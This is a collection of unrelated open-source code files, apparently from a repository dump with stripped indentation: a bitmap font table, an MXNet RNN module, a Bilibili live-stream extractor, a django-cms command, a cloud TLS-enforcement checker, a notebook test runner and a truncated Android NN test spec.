b'\x00\x0f\xc0\x1f\x80\x00\x0f\xc0\x0f\xc0\x00\x1f\x80\x0f\xc0\x00'\
b'\x1f\x80\x0f\xc0\x00\x1f\x80\x0f\xc0\x00\x1f\x80\x0f\xe0\x00\x3f'\
b'\x80\x07\xe0\x00\x3f\x00\x07\xf0\x00\x7f\x00\x07\xf8\x00\xff\x00'\
b'\x03\xfc\x01\xfe\x00\x03\xff\x07\xfe\x00\x01\xff\xff\xfc\x00\x00'\
b'\xff\xff\xf8\x00\x00\x7f\xff\xf0\x00\x00\x3f\xff\xe0\x00\x00\x0f'\
b'\xff\x80\x00\x00\x03\xfe\x00\x00\x25\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x07\x80\x00\x00\x00\x0f\x80\x00\x00\x00\x0f\x80\x00\x00\x00'\
b'\x1f\x80\x00\x00\x00\x3f\x80\x00\x00\x00\x7f\x80\x00\x00\x00\xff'\
b'\x80\x00\x00\x03\xff\x80\x00\x00\x07\xff\x80\x00\x00\x0f\xff\x80'\
b'\x00\x00\x3f\xff\x80\x00\x00\xff\xdf\x80\x00\x01\xff\x9f\x80\x00'\
b'\x01\xfe\x1f\x80\x00\x01\xfc\x1f\x80\x00\x01\xf0\x1f\x80\x00\x01'\
b'\xc0\x1f\x80\x00\x00\x00\x1f\x80\x00\x00\x00\x1f\x80\x00\x00\x00'\
b'\x1f\x80\x00\x00\x00\x1f\x80\x00\x00\x00\x1f\x80\x00\x00\x00\x1f'\
b'\x80\x00\x00\x00\x1f\x80\x00\x00\x00\x1f\x80\x00\x00\x00\x1f\x80'\
b'\x00\x00\x00\x1f\x80\x00\x00\x00\x1f\x80\x00\x00\x00\x1f\x80\x00'\
b'\x00\x00\x1f\x80\x00\x00\x00\x1f\x80\x00\x00\x00\x1f\x80\x00\x00'\
b'\x00\x1f\x80\x00\x00\x00\x1f\x80\x00\x00\x00\x1f\x80\x00\x00\x00'\
b'\x1f\x80\x00\x00\x00\x1f\x80\x00\x00\x00\x1f\x80\x00\x00\x00\x1f'\
b'\x80\x00\x00\x00\x1f\x80\x00\x00\x00\x1f\x80\x00\x00\x00\x1f\x80'\
b'\x00\x00\x00\x1f\x80\x00\x00\x00\x1f\x80\x00\x00\x00\x1f\x80\x00'\
b'\x00\x00\x1f\x80\x00\x00\x00\x1f\x80\x00\x00\x00\x1f\x80\x00\x00'\
b'\x00\x00\x00\x00\x25\x00\x00\x00\x00\x00\x00\x00\x03\xfe\x00\x00'\
b'\x00\x1f\xff\xc0\x00\x00\x7f\xff\xe0\x00\x01\xff\xff\xf8\x00\x03'\
b'\xff\xff\xfc\x00\x03\xff\xff\xfc\x00\x07\xfe\x07\xfe\x00\x0f\xf0'\
b'\x00\xff\x00\x0f\xe0\x00\x7f\x00\x0f\xc0\x00\x3f\x00\x1f\xc0\x00'\
b'\x3f\x80\x1f\x80\x00\x1f\x80\x1f\x80\x00\x1f\x80\x03\x80\x00\x1f'\
b'\x80\x00\x00\x00\x1f\x80\x00\x00\x00\x1f\x80\x00\x00\x00\x1f\x80'\
b'\x00\x00\x00\x3f\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x7f\x00\x00'\
b'\x00\x00\xfe\x00\x00\x00\x01\xfe\x00\x00\x00\x03\xfc\x00\x00\x00'\
b'\x07\xf8\x00\x00\x00\x0f\xf0\x00\x00\x00\x1f\xe0\x00\x00\x00\x3f'\
b'\xe0\x00\x00\x00\x7f\xc0\x00\x00\x00\xff\x80\x00\x00\x01\xfe\x00'\
b'\x00\x00\x03\xfc\x00\x00\x00\x07\xf8\x00\x00\x00\x1f\xf0\x00\x00'\
b'\x00\x3f\xe0\x00\x00\x00\x7f\xc0\x00\x00\x00\xff\x80\x00\x00\x01'\
b'\xfe\x00\x00\x00\x03\xfc\x00\x00\x00\x07\xf8\x00\x00\x00\x07\xf0'\
b'\x00\x00\x00\x0f\xe0\x00\x00\x00\x0f\xe0\x00\x00\x00\x1f\xff\xff'\
b'\xff\x80\x1f\xff\xff\xff\x80\x3f\xff\xff\xff\x80\x3f\xff\xff\xff'\
b'\x80\x3f\xff\xff\xff\x80\x3f\xff\xff\xff\x80\x00\x00\x00\x00\x00'\
b'\x25\x00\x00\x00\x00\x00\x00\x00\x07\xfc\x00\x00\x00\x1f\xff\x80'\
b'\x00\x00\x7f\xff\xe0\x00\x00\xff\xff\xf0\x00\x01\xff\xff\xf8\x00'\
b'\x03\xff\xff\xfc\x00\x07\xfc\x07\xfe\x00\x0f\xf0\x01\xfe\x00\x0f'\
b'\xe0\x00\xfe\x00\x0f\xc0\x00\x7f\x00\x1f\xc0\x00\x3f\x00\x1f\x80'\
b'\x00\x3f\x00\x03\x80\x00\x3f\x00\x00\x00\x00\x3f\x00\x00\x00\x00'\
b'\x3f\x00\x00\x00\x00\x7e\x00\x00\x00\x00\xfe\x00\x00\x00\x01\xfc'\
b'\x00\x00\x00\x0f\xf8\x00\x00\x01\xff\xf0\x00\x00\x01\xff\xe0\x00'\
b'\x00\x01\xff\xe0\x00\x00\x01\xff\xf8\x00\x00\x01\xff\xfc\x00\x00'\
b'\x01\x8f\xfe\x00\x00\x00\x01\xff\x00\x00\x00\x00\x7f\x00\x00\x00'\
b'\x00\x3f\x80\x00\x00\x00\x1f\x80\x00\x00\x00\x1f\xc0\x00\x00\x00'\
b'\x0f\xc0\x00\x00\x00\x0f\xc0\x00\x00\x00\x0f\xc0\x00\x00\x00\x0f'\
b'\xc0\x00\x00\x00\x0f\xc0\x03\x80\x00\x0f\xc0\x1f\x80\x00\x0f\xc0'\
b'\x1f\xc0\x00\x1f\x80\x1f\xc0\x00\x1f\x80\x0f\xe0\x00\x3f\x80\x0f'\
b'\xf0\x00\x7f\x00\x07\xf8\x00\xff\x00\x07\xfe\x03\xfe\x00\x03\xff'\
b'\xff\xfc\x00\x01\xff\xff\xf8\x00\x00\xff\xff\xf0\x00\x00\x7f\xff'\
b'\xe0\x00\x00\x1f\xff\x80\x00\x00\x03\xfc\x00\x00\x25\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xf0\x00\x00\x00\x03'\
b'\xf0\x00\x00\x00\x07\xf0\x00\x00\x00\x0f\xf0\x00\x00\x00\x0f\xf0'\
b'\x00\x00\x00\x1f\xf0\x00\x00\x00\x3f\xf0\x00\x00\x00\x7f\xf0\x00'\
b'\x00\x00\x7f\xf0\x00\x00\x00\xff\xf0\x00\x00\x01\xff\xf0\x00\x00'\
b'\x01\xff\xf0\x00\x00\x03\xfb\xf0\x00\x00\x07\xf3\xf0\x00\x00\x0f'\
b'\xf3\xf0\x00\x00\x0f\xe3\xf0\x00\x00\x1f\xc3\xf0\x00\x00\x3f\x83'\
b'\xf0\x00\x00\x7f\x83\xf0\x00\x00\x7f\x03\xf0\x00\x00\xfe\x03\xf0'\
b'\x00\x01\xfc\x03\xf0\x00\x03\xfc\x03\xf0\x00\x03\xf8\x03\xf0\x00'\
b'\x07\xf0\x03\xf0\x00\x0f\xf0\x03\xf0\x00\x0f\xe0\x03\xf0\x00\x1f'\
b'\xc0\x03\xf0\x00\x3f\x80\x03\xf0\x00\x7f\x80\x03\xf0\x00\x7f\xff'\
b'\xff\xff\xc0\x7f\xff\xff\xff\xc0\x7f\xff\xff\xff\xc0\x7f\xff\xff'\
b'\xff\xc0\x7f\xff\xff\xff\xc0\x7f\xff\xff\xff\xc0\x00\x00\x03\xf0'\
b'\x00\x00\x00\x03\xf0\x00\x00\x00\x03\xf0\x00\x00\x00\x03\xf0\x00'\
b'\x00\x00\x03\xf0\x00\x00\x00\x03\xf0\x00\x00\x00\x03\xf0\x00\x00'\
b'\x00\x03\xf0\x00\x00\x00\x03\xf0\x00\x00\x00\x03\xf0\x00\x00\x00'\
b'\x03\xf0\x00\x00\x00\x00\x00\x00\x25\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x7f\xff\xff\x00\x00\x7f\xff\xff\x00\x00\xff'\
b'\xff\xff\x00\x00\xff\xff\xff\x00\x00\xff\xff\xff\x00\x00\xff\xff'\
b'\xff\x00\x00\xfc\x00\x00\x00\x01\xfc\x00\x00\x00\x01\xf8\x00\x00'\
b'\x00\x01\xf8\x00\x00\x00\x01\xf8\x00\x00\x00\x01\xf8\x00\x00\x00'\
b'\x03\xf8\x00\x00\x00\x03\xf0\x00\x00\x00\x03\xf0\x00\x00\x00\x03'\
b'\xf0\x7f\x00\x00\x03\xf3\xff\xc0\x00\x07\xf7\xff\xf0\x00\x07\xff'\
b'\xff\xf8\x00\x07\xff\xff\xfc\x00\x07\xff\xff\xfe\x00\x07\xfe\x03'\
b'\xff\x00\x0f\xf8\x00\xff\x00\x0f\xf0\x00\x7f\x80\x0f\xe0\x00\x3f'\
b'\x80\x01\xc0\x00\x1f\x80\x00\x00\x00\x1f\xc0\x00\x00\x00\x0f\xc0'\
b'\x00\x00\x00\x0f\xc0\x00\x00\x00\x0f\xc0\x00\x00\x00\x0f\xc0\x00'\
b'\x00\x00\x0f\xc0\x00\x00\x00\x0f\xc0\x00\x00\x00\x0f\xc0\x00\x00'\
b'\x00\x0f\xc0\x1f\x80\x00\x1f\x80\x1f\x80\x00\x1f\x80\x1f\xc0\x00'\
b'\x1f\x80\x0f\xc0\x00\x3f\x00\x0f\xe0\x00\x7f\x00\x07\xf0\x00\xfe'\
b'\x00\x07\xfc\x03\xfe\x00\x03\xff\xff\xfc\x00\x01\xff\xff\xf8\x00'\
b'\x00\xff\xff\xf0\x00\x00\x7f\xff\xe0\x00\x00\x1f\xff\x80\x00\x00'\
b'\x07\xfc\x00\x00\x25\x00\x00\x00\x00\x00\x00\x00\x01\xfe\x00\x00'\
b'\x00\x0f\xff\xc0\x00\x00\x3f\xff\xf0\x00\x00\x7f\xff\xf8\x00\x00'\
b'\xff\xff\xfc\x00\x01\xff\xff\xfe\x00\x03\xff\x03\xfe\x00\x03\xf8'\
b'\x00\xff\x00\x07\xf0\x00\x7f\x00\x07\xf0\x00\x3f\x00\x0f\xe0\x00'\
b'\x3f\x80\x0f\xc0\x00\x1f\x80\x0f\xc0\x00\x00\x00\x1f\x80\x00\x00'\
b'\x00\x1f\x80\x00\x00\x00\x1f\x80\x00\x00\x00\x1f\x80\x00\x00\x00'\
b'\x1f\x00\xff\x00\x00\x3f\x07\xff\xc0\x00\x3f\x0f\xff\xf0\x00\x3f'\
b'\x3f\xff\xf8\x00\x3f\x7f\xff\xfc\x00\x3f\x7f\xff\xfe\x00\x3f\xfe'\
b'\x03\xff\x00\x3f\xf0\x00\xff\x00\x3f\xe0\x00\x7f\x80\x3f\xc0\x00'\
b'\x3f\x80\x3f\x80\x00\x1f\x80\x3f\x80\x00\x1f\xc0\x3f\x00\x00\x0f'\
b'\xc0\x3f\x00\x00\x0f\xc0\x3f\x00\x00\x0f\xc0\x3f\x00\x00\x0f\xc0'\
b'\x1f\x00\x00\x0f\xc0\x1f\x00\x00\x0f\xc0\x1f\x00\x00\x0f\xc0\x1f'\
b'\x80\x00\x1f\xc0\x1f\x80\x00\x1f\x80\x0f\xc0\x00\x1f\x80\x0f\xc0'\
b'\x00\x3f\x80\x07\xe0\x00\x7f\x00\x07\xf8\x00\xff\x00\x03\xfe\x03'\
b'\xfe\x00\x01\xff\xff\xfc\x00\x01\xff\xff\xfc\x00\x00\x7f\xff\xf8'\
b'\x00\x00\x3f\xff\xe0\x00\x00\x0f\xff\xc0\x00\x00\x01\xfe\x00\x00'\
b'\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1f\xff\xff\xff'\
b'\xc0\x1f\xff\xff\xff\xc0\x1f\xff\xff\xff\xc0\x1f\xff\xff\xff\xc0'\
b'\x1f\xff\xff\xff\xc0\x1f\xff\xff\xff\x80\x00\x00\x00\x0f\x80\x00'\
b'\x00\x00\x1f\x00\x00\x00\x00\x3e\x00\x00\x00\x00\x7c\x00\x00\x00'\
b'\x00\xfc\x00\x00\x00\x01\xf8\x00\x00\x00\x01\xf0\x00\x00\x00\x03'\
b'\xf0\x00\x00\x00\x07\xe0\x00\x00\x00\x07\xc0\x00\x00\x00\x0f\xc0'\
b'\x00\x00\x00\x1f\x80\x00\x00\x00\x1f\x80\x00\x00\x00\x3f\x00\x00'\
b'\x00\x00\x3f\x00\x00\x00\x00\x7e\x00\x00\x00\x00\x7e\x00\x00\x00'\
b'\x00\xfc\x00\x00\x00\x00\xfc\x00\x00\x00\x01\xf8\x00\x00\x00\x01'\
b'\xf8\x00\x00\x00\x03\xf0\x00\x00\x00\x03\xf0\x00\x00\x00\x03\xf0'\
b'\x00\x00\x00\x07\xe0\x00\x00\x00\x07\xe0\x00\x00\x00\x07\xe0\x00'\
b'\x00\x00\x0f\xc0\x00\x00\x00\x0f\xc0\x00\x00\x00\x0f\xc0\x00\x00'\
b'\x00\x0f\xc0\x00\x00\x00\x1f\x80\x00\x00\x00\x1f\x80\x00\x00\x00'\
b'\x1f\x80\x00\x00\x00\x1f\x80\x00\x00\x00\x1f\x80\x00\x00\x00\x3f'\
b'\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x3f\x00'\
b'\x00\x00\x00\x3f\x00\x00\x00\x00\x00\x00\x00\x00\x25\x00\x00\x00'\
b'\x00\x00\x00\x00\x03\xfe\x00\x00\x00\x1f\xff\x80\x00\x00\x3f\xff'\
b'\xe0\x00\x00\x7f\xff\xf0\x00\x00\xff\xff\xf8\x00\x01\xff\xff\xfc'\
b'\x00\x03\xfe\x03\xfe\x00\x03\xf8\x00\xfe\x00\x03\xf0\x00\x7e\x00'\
b'\x07\xf0\x00\x7f\x00\x07\xe0\x00\x3f\x00\x07\xe0\x00\x3f\x00\x07'\
b'\xe0\x00\x3f\x00\x07\xe0\x00\x3f\x00\x07\xe0\x00\x3f\x00\x07\xf0'\
b'\x00\x7f\x00\x03\xf0\x00\x7e\x00\x03\xf8\x00\xfe\x00\x01\xfe\x03'\
b'\xfc\x00\x00\xff\xff\xf8\x00\x00\x7f\xff\xf0\x00\x00\x1f\xff\xc0'\
b'\x00\x00\x3f\xff\xe0\x00\x00\xff\xff\xf8\x00\x01\xff\xff\xfc\x00'\
b'\x03\xfe\x03\xfe\x00\x07\xf8\x00\xff\x00\x07\xe0\x00\x7f\x00\x0f'\
b'\xe0\x00\x3f\x80\x0f\xc0\x00\x1f\x80\x1f\xc0\x00\x1f\xc0\x1f\x80'\
b'\x00\x0f\xc0\x1f\x80\x00\x0f\xc0\x1f\x80\x00\x0f\xc0\x1f\x80\x00'\
b'\x0f\xc0\x1f\x80\x00\x0f\xc0\x1f\x80\x00\x0f\xc0\x1f\xc0\x00\x1f'\
b'\xc0\x0f\xc0\x00\x1f\x80\x0f\xc0\x00\x3f\x80\x0f\xe0\x00\x3f\x80'\
b'\x07\xf8\x00\xff\x00\x07\xfe\x03\xff\x00\x03\xff\xff\xfe\x00\x01'\
b'\xff\xff\xfc\x00\x00\xff\xff\xf8\x00\x00\x7f\xff\xf0\x00\x00\x1f'\
b'\xff\xc0\x00\x00\x03\xfe\x00\x00\x25\x00\x00\x00\x00\x00\x00\x00'\
b'\x03\xfc\x00\x00\x00\x1f\xff\x00\x00\x00\x7f\xff\xc0\x00\x00\xff'\
b'\xff\xf0\x00\x01\xff\xff\xf8\x00\x03\xff\xff\xfc\x00\x03\xfe\x03'\
b'\xfc\x00\x07\xf8\x00\xfe\x00\x0f\xf0\x00\x7e\x00\x0f\xe0\x00\x3f'\
b'\x00\x0f\xe0\x00\x1f\x00\x1f\xc0\x00\x1f\x80\x1f\xc0\x00\x0f\x80'\
b'\x1f\x80\x00\x0f\x80\x1f\x80\x00\x0f\x80\x1f\x80\x00\x0f\xc0\x1f'\
b'\x80\x00\x0f\xc0\x1f\x80\x00\x0f\xc0\x1f\x80\x00\x0f\xc0\x1f\x80'\
b'\x00\x0f\xc0\x1f\xc0\x00\x1f\xc0\x0f\xc0\x00\x1f\xc0\x0f\xe0\x00'\
b'\x3f\xc0\x0f\xf0\x00\x7f\xc0\x07\xf8\x00\xff\xc0\x07\xfe\x03\xff'\
b'\xc0\x03\xff\xff\xff\xc0\x01\xff\xff\xef\xc0\x00\xff\xff\xcf\xc0'\
b'\x00\x7f\xff\x0f\xc0\x00\x1f\xfe\x0f\xc0\x00\x07\xf0\x0f\xc0\x00'\
b'\x00\x00\x1f\x80\x00\x00\x00\x1f\x80\x00\x00\x00\x1f\x80\x00\x00'\
b'\x00\x1f\x80\x00\x00\x00\x3f\x00\x0f\xc0\x00\x3f\x00\x0f\xc0\x00'\
b'\x3f\x00\x0f\xe0\x00\x7e\x00\x07\xe0\x00\xfe\x00\x07\xf0\x01\xfc'\
b'\x00\x03\xfc\x07\xfc\x00\x03\xff\xff\xf8\x00\x01\xff\xff\xf0\x00'\
b'\x00\xff\xff\xe0\x00\x00\x7f\xff\xc0\x00\x00\x1f\xff\x00\x00\x00'\
b'\x07\xf8\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x03\xf0\x00\x03\xf0\x00\x03\xf0\x00\x03\xf0\x00\x03\xf0\x00\x03'\
b'\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x03\xf0\x00\x03\xf0\x00\x03\xf0\x00'\
b'\x03\xf0\x00\x03\xf0\x00\x03\xf0\x00\x00\x00\x00'
_index =\
b'\x00\x00\xfc\x00\xf8\x01\xf4\x02\xf0\x03\xec\x04\xe8\x05\xe4\x06'\
b'\xe0\x07\xdc\x08\xd8\x09\xd4\x0a\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x6c\x0b'
_mvfont = memoryview(_font)
_mvi = memoryview(_index)
ifb = lambda l : l[0] | (l[1] << 8)
def get_ch(ch):
oc = ord(ch)
ioff = 2 * (oc - 48 + 1) if oc >= 48 and oc <= 63 else 0
doff = ifb(_mvi[ioff : ])
width = ifb(_mvfont[doff : ])
next_offs = doff + 2 + ((width - 1)//8 + 1) * 50
return _mvfont[doff + 2:next_offs], 50, width
|
example/rnn/word_lm/module.py | Vikas-kum/incubator-mxnet | 228 | 12610958 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import mxnet as mx
import logging
class CustomStatefulModule():
"""CustomStatefulModule is a module that takes a custom loss symbol and state symbols.
The custom loss is typically composed by `mx.sym.make_loss` or `mx.sym.MakeLoss`.
The states listed in `state_names` will be carried between iterations.
Parameters
----------
loss : Symbol
The custom loss symbol
states: list of Symbol
The symbols of next states
state_names : list of str
states are similar to data and label, but not provided by data iterator.
Instead they are initialized to `initial_states` and can be carried between iterations.
data_names : list of str
Defaults to `('data')` for a typical model used in image classification.
label_names : list of str
Defaults to `('softmax_label')` for a typical model used in image
classification.
logger : Logger
Defaults to `logging`.
context : Context or list of Context
Defaults to ``mx.cpu()``.
initial_states: float or list of NDArray
Defaults to 0.0.
"""
def __init__(self, loss, states, state_names, data_names=('data',), label_names=('label',),
context=mx.cpu(), initial_states=0.0, **kwargs):
if isinstance(states, mx.symbol.Symbol):
states = [states]
self._net = mx.sym.Group(states + [loss])
self._next_states = initial_states
self._module = mx.module.Module(self._net, data_names=data_names, label_names=label_names,
context=context, state_names=state_names, **kwargs)
def backward(self, out_grads=None):
"""Backward computation.
"""
self._module.backward(out_grads=out_grads)
def init_params(self, initializer=mx.init.Uniform(0.01), **kwargs):
"""Initializes the parameters and auxiliary states.
"""
self._module.init_params(initializer=initializer, **kwargs)
def init_optimizer(self, **kwargs):
"""Installs and initializes optimizers, as well as initialize kvstore for
distributed training.
"""
self._module.init_optimizer(**kwargs)
def bind(self, data_shapes, **kwargs):
"""Binds the symbols to construct executors. This is necessary before one
can perform computation with the module.
"""
self._module.bind(data_shapes, **kwargs)
def forward(self, data_batch, is_train=None, carry_state=True):
"""Forward computation. States from previous forward computation are carried
to the current iteration if `carry_state` is set to `True`.
"""
# propagate states from the previous iteration
if carry_state:
if isinstance(self._next_states, (int, float)):
self._module.set_states(value=self._next_states)
else:
self._module.set_states(states=self._next_states)
self._module.forward(data_batch, is_train=is_train)
outputs = self._module.get_outputs(merge_multi_context=False)
self._next_states = outputs[:-1]
def update(self, max_norm=None):
"""Updates parameters according to the installed optimizer and the gradients computed
in the previous forward-backward batch. Gradients are clipped by their global norm
if `max_norm` is set.
Parameters
----------
max_norm: float, optional
If set, clip values of all gradients the ratio of the sum of their norms.
"""
if max_norm is not None:
self._clip_by_global_norm(max_norm)
self._module.update()
def _clip_by_global_norm(self, max_norm):
"""Clips gradient norm.
The norm is computed over all gradients together, as if they were
concatenated into a single vector. Gradients are modified in-place.
The method is first used in
`[ICML2013] On the difficulty of training recurrent neural networks`
Parameters
----------
max_norm : float or int
The maximum clipping threshold of the gradient norm.
Returns
-------
norm_val : float
The computed norm of the gradients.
"""
assert self._module.binded and self._module.params_initialized \
and self._module.optimizer_initialized
grad_array = []
for grad in self._module._exec_group.grad_arrays:
grad_array += grad
return mx.gluon.utils.clip_global_norm(grad_array, max_norm)
def get_loss(self):
"""Gets the output loss of the previous forward computation.
"""
return self._module.get_outputs(merge_multi_context=False)[-1]
|
ykdl/extractors/bilibili/live.py | SeaHOH/ykdl | 136 | 12610959 | # -*- coding: utf-8 -*-
from .._common import *
class BiliLive(Extractor):
name = 'Bilibili live (哔哩哔哩 直播)'
profile_2_id = {
'4K': '4K',
'原画': 'OG',
'蓝光': 'BD',
'超清': 'TD',
'高清': 'HD',
'流畅': 'SD'
}
def prepare(self):
info = MediaInfo(self.name, True)
ID = match1(self.url, '/(\d+)')
api1_data = get_response(
'https://api.live.bilibili.com/room/v1/Room/room_init',
params={'id': ID}).json()
if api1_data['code'] == 0:
self.vid = api1_data['data']['room_id']
else:
self.logger.debug('Get room ID from API failed: %s', api1_data['msg'])
self.vid = ID
api2_data = get_response(
'https://api.live.bilibili.com/room/v1/Room/get_info',
params={'room_id': self.vid}).json()
assert api2_data['code'] == 0, api2_data['msg']
api2_data = api2_data['data']
assert api2_data['live_status'] == 1, '主播正在觅食......'
info.title = title = api2_data['title']
api3_data = get_response(
'https://api.live.bilibili.com/live_user/v1/UserInfo/get_anchor_in_room',
params={'roomid': self.vid}).json()
if api3_data['code'] == 0:
info.artist = artist = api3_data['data']['info']['uname']
info.title = '{title} - {artist}'.format(**vars())
def get_live_info(qn=1):
data = get_response(
'https://api.live.bilibili.com/xlive/web-room/v1/playUrl/playUrl',
params={
'https_url_req': 1,
'cid': self.vid,
'platform': 'web',
'qn': qn,
'ptype': 16
}).json()
assert data['code'] == 0, data['msg']
data = data['data']
urls = [random.choice(data['durl'])['url']]
qlt = data['current_qn']
aqlts = {x['qn']: x['desc'] for x in data['quality_description']}
size = float('inf')
ext = 'flv'
prf = aqlts[qlt]
st = self.profile_2_id[prf]
if urls:
info.streams[st] = {
'container': ext,
'video_profile': prf,
'src' : urls,
'size': size
}
if qn == 1:
del aqlts[qlt]
for aqlt in aqlts:
get_live_info(aqlt)
get_live_info()
return info
site = BiliLive()
|
terrascript/spotinst/r.py | hugovk/python-terrascript | 507 | 12610971 | # terrascript/spotinst/r.py
|
cms/management/commands/cms.py | devyntk/django-cms | 5,659 | 12610973 | <reponame>devyntk/django-cms<gh_stars>1000+
from collections import OrderedDict
import cms
from .subcommands.base import SubcommandsCommand
from .subcommands.check import CheckInstallation
from .subcommands.copy import CopyCommand
from .subcommands.delete_orphaned_plugins import DeleteOrphanedPluginsCommand
from .subcommands.list import ListCommand
from .subcommands.publisher_publish import PublishCommand
from .subcommands.tree import FixTreeCommand
from .subcommands.uninstall import UninstallCommand
class Command(SubcommandsCommand):
command_name = 'cms'
subcommands = OrderedDict((
('check', CheckInstallation),
('copy', CopyCommand),
('delete-orphaned-plugins', DeleteOrphanedPluginsCommand),
('fix-tree', FixTreeCommand),
('list', ListCommand),
('publisher-publish', PublishCommand),
('uninstall', UninstallCommand),
))
missing_args_message = 'one of the available sub commands must be provided'
subcommand_dest = 'cmd'
def get_version(self):
return cms.__version__
def add_arguments(self, parser):
parser.add_argument('--version', action='version', version=self.get_version())
super().add_arguments(parser)
|
cloudmarker/events/rdbmsenforcetlsevent.py | TinLe/cloudmarker | 208 | 12610980 | """RDBMS Enforce TLS/SSL Event.
This module defines the :class:`RDBMSEnforceTLSEvent` class that
identifies RDBMS servers which have TLS/SSL connection enforcement
disabled. This plugin works on the properties found in the ``com``
bucket of ``rdbms`` records.
"""
import logging
from cloudmarker import util
_log = logging.getLogger(__name__)
class RDBMSEnforceTLSEvent:
"""Az RDBMS TLS/SSL enforcement event plugin."""
def __init__(self):
"""Create an instance of :class:`RDBMSEnforceTLSEvent`."""
def eval(self, record):
"""Evaluate RDBMS servers for TLS connection enforcement.
Arguments:
record (dict): An RDBMS record.
Yields:
dict: An event record representing an RDBMS where TLS
connection enforcement is disabled
"""
com = record.get('com', {})
if com is None:
return
if com.get('record_type') != 'rdbms':
return
ext = record.get('ext', {})
if ext is None:
return
# True, None, missing key or any other value will not
# genarated an event. An event will be generated only if
# the value of `tls_enforced` is False.
if com.get('tls_enforced') is False:
yield from _get_rdbms_tls_enforcement_event(
com, ext)
def done(self):
"""Perform cleanup work.
Currently, this method does nothing. This may change in future.
"""
def _get_rdbms_tls_enforcement_event(com, ext):
"""Generate event for TLS enforcement disabled.
Arguments:
com (dict): RDBMS record `com` bucket
ext (dict): RDBMS record `ext` bucket
Returns:
dict: An event record representing RDBMS with SSL
connection enforcement disabled
"""
friendly_cloud_type = util.friendly_string(com.get('cloud_type'))
friendly_rdbms_type = util.friendly_string(ext.get('record_type'))
reference = com.get('reference')
description = (
'{} {} {} has TLS/SSL enforcement disabled.'
.format(friendly_cloud_type, friendly_rdbms_type, reference)
)
recommendation = (
'Check {} {} {} and enable TLS/SSL enforcement.'
.format(friendly_cloud_type, friendly_rdbms_type, reference)
)
event_record = {
# Preserve the extended properties from the RDBMS
# record because they provide useful context to
# locate the RDBMS that led to the event.
'ext': util.merge_dicts(ext, {
'record_type': 'rdbms_enforce_tls_event'
}),
'com': {
'cloud_type': com.get('cloud_type'),
'record_type': 'rdbms_enforce_tls_event',
'reference': reference,
'description': description,
'recommendation': recommendation,
}
}
_log.info('Generating rdbms_enforce_tls_event; %r', event_record)
yield event_record
|
tests/test_all_notebooks.py | maulanailyasy/miepythonscot | 104 | 12610987 | <reponame>maulanailyasy/miepythonscot<gh_stars>100-1000
# pylint: disable=invalid-name
"""
This file is intended to be the target of a pytest run.
It will recursively find all .ipynb files in the current directory, ignoring
directories that start with . and any files matching patterins found in the file
.testignore
List patterns to skip in .testignore file:
under_construction/*
Sample invocations of pytest which make the output nicely readable:
pytest --verbose --durations=5 test_all_notebooks.py
If you install pytest-xdist you can run tests in parallel with
pytest --verbose --durations=5 -n 4 test_all_notebooks.py
Original version is licensed under GPL 3.0 so this one is too.
The original can be located at
https://github.com/alchemyst/Dynamics-and-Control/test_all_notebooks.py
"""
import os.path
import pathlib
import pytest
import nbformat
import nbconvert.preprocessors
# Default search path is the current directory
# searchpath = pathlib.Path('.')
searchpath = pathlib.Path('./docs/') # all notebooks are in here
# Read patterns from .testignore file
ignores = ''
if os.path.exists('.testignore'):
ignores = [line.strip() for line in open('.testignore') if line.strip()]
# Ignore hidden folders (startswith('.')) and files matching ignore patterns
notebooks = [notebook for notebook in searchpath.glob('**/*.ipynb')
if not (any(parent.startswith('.')
for parent in notebook.parent.parts)
or any(notebook.match(pattern)
for pattern in ignores))]
notebooks.sort()
ids = [n.as_posix() for n in notebooks]
for n in notebooks:
print(n)
@pytest.mark.notebooks
@pytest.mark.parametrize("notebook", notebooks, ids=ids)
def test_run_notebook(notebook):
"""Read and execute notebook.
The method here is directly from the nbconvert docs
Note that there is no error handling in this file as any errors will be
caught by pytest
"""
with open(notebook) as f:
nb = nbformat.read(f, as_version=4)
ep = nbconvert.preprocessors.ExecutePreprocessor(timeout=600)
ep.preprocess(nb, {'metadata': {'path': notebook.parent}})
|
test/cts/tool/CTSConverter/src/nn/specs/V1_1/pad_float_1_relaxed.mod.py | zhaoming0/webml-polyfill | 255 | 12611011 | <reponame>zhaoming0/webml-polyfill<gh_stars>100-1000
#
# Copyright (C) 2018 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# model
model = Model()
